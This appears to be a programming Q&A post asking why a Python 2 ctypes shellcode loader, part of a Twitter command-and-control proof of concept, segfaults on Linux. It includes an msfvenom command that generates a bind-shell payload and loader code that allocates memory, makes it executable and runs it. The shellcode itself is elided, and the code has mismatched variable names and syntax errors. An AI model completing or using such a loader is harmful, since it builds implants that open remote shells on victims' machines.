Background:
Writing a proof of concept of a twitter C&C inspired by Prof Viviek of SPSE similiar to twittor and the project includes a functionality of injecting shellcode and executing it within the python's program. However I wanted to make the functionality cross platforms, but it only worked in a windows system.
Problem: When executing the python script in ubuntu server 12.04.5 LTS, the output says
Segmentation fault (core dumped)
Which means I am getting denied for accessing memory that I don't have permission for. This is strange b/c in the source code I also set cytpes.mprotect(allocated_space, space_size, 7) <== 4 + 2 + 1 is for wrx permissions
Shellcode generated using command:
msfvenom --payload linux/x86/shell/bind_tcp --format py --arch x86 --bad-char "\x00\x20\x0d"
Python Script:
#!/usr/bin/env python
import ctypes
import os
# please comment out the appropriate payload for the other platforms
# this below is for windows shell bind tcp listening at 4444
#buf = ""
#buf += "shellcode..."
# below is for linux
buf = ""
buf += "shellcode..."
def main(shellcode):
if os.name == 'posix':
try:
libc = ctypes.CDLL('libc.so.6')
sc_ptr = ctypes.c_char_p(shellcode)
size = len(shellcode)
addr_freespace = ctypes.c_void_p(libc.valloc(size))
ctypes.memmove(addr_freespace, sc_ptr, size)
libc.mprotect(addr_free_space, size, 1 | 2 | 4) # changed to 7 for all three access
run = ctypes.cast(free_space, ctypes.CFUNCTYPE(ctypes.c_void_p))
run()
sys.exit()
except Exception as e:
print "Error: " e
else:
try: # windows implementation
if __name__ == '__main__':
main(buf)
Question: Can someone explain why does the segmentation fault message appear and how do we fix such problem?
Credits: this script is inspired by sickle.py @ Line743-753
The only difference is the reference script is using python 3, while I am using python 2.7.
UPDATE:
After many trials and errors, including running the program in pdb. The segmentation fault error happened after the line of:
run()
Can someone please explain why this is happening?
